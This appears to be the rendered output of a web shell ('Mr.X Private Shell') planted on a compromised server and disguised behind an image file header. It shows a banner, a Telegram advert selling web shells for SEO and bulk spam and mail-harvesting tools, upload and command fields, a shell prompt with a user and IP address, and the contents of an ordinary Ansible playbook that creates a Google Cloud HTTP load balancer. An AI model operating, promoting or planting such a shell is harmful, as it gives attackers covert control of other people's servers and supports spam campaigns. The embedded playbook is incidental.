����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
---
- name: create a global address for the load balancer.
  gcp_compute_global_address:
      name: "{{ gcp_http_lb_globaladdress }}"
      project: "{{ gcp_project }}"
      auth_kind: "{{ gcp_cred_kind }}"
      service_account_file: "{{ gcp_cred_file }}"
      state: "{{ gcp_http_lb_state }}"
  register: globaladdress
- name: create a http health check to verify lb working
  gcp_compute_http_health_check:
      name: "{{ gcp_http_lb_healthcheck }}"
      healthy_threshold: 10
      port: 80
      timeout_sec: 2
      unhealthy_threshold: 5
      project: "{{ gcp_project }}"
      auth_kind: "{{ gcp_cred_kind }}"
      service_account_file: "{{ gcp_cred_file }}"
      state: "{{ gcp_http_lb_state }}"
  register: healthcheck
- name: create a backend service
  gcp_compute_backend_service:
      name: "{{ gcp_http_lb_backendservice }}"
      backends:
      - group: "{{ gcp_http_lb_backend.selfLink }}"
      health_checks:
      - "{{ healthcheck.selfLink }}"
      enable_cdn: "{{ gcp_http_lb_cdn }}"
      project: "{{ gcp_project }}"
      auth_kind: "{{ gcp_cred_kind }}"
      service_account_file: "{{ gcp_cred_file }}"
      state: "{{ gcp_http_lb_state }}"
  register: backendservice
- name: create a url map
  gcp_compute_url_map:
      name: "{{ gcp_http_lb_urlmap }}"
      default_service: "{{ backendservice }}"
      project: "{{ gcp_project }}"
      auth_kind: "{{ gcp_cred_kind }}"
      service_account_file: "{{ gcp_cred_file }}"
      state: "{{ gcp_http_lb_state }}"
  register: urlmap
- name: create a target http proxy
  gcp_compute_target_http_proxy:
      name: "{{ gcp_http_lb_httpproxy }}"
      url_map: "{{ urlmap }}"
      project: "{{ gcp_project }}"
      auth_kind: "{{ gcp_cred_kind }}"
      service_account_file: "{{ gcp_cred_file }}"
      state: "{{ gcp_http_lb_state }}"
  register: httpproxy
- name: create a global forwarding rule
  gcp_compute_global_forwarding_rule:
      name: "{{ gcp_http_lb_forwardingrule }}"
      ip_address: "{{ globaladdress.address }}"
      load_balancing_scheme: "EXTERNAL"
      ip_protocol: TCP
      port_range: 80-80
      target: "{{ httpproxy.selfLink }}"
      project: "{{ gcp_project }}"
      auth_kind: "{{ gcp_cred_kind }}"
      service_account_file: "{{ gcp_cred_file }}"
      state: "{{ gcp_http_lb_state }}"
  register: result

Filemanager

Name Type Size Permission Actions
main.yml File 2.27 KB 0644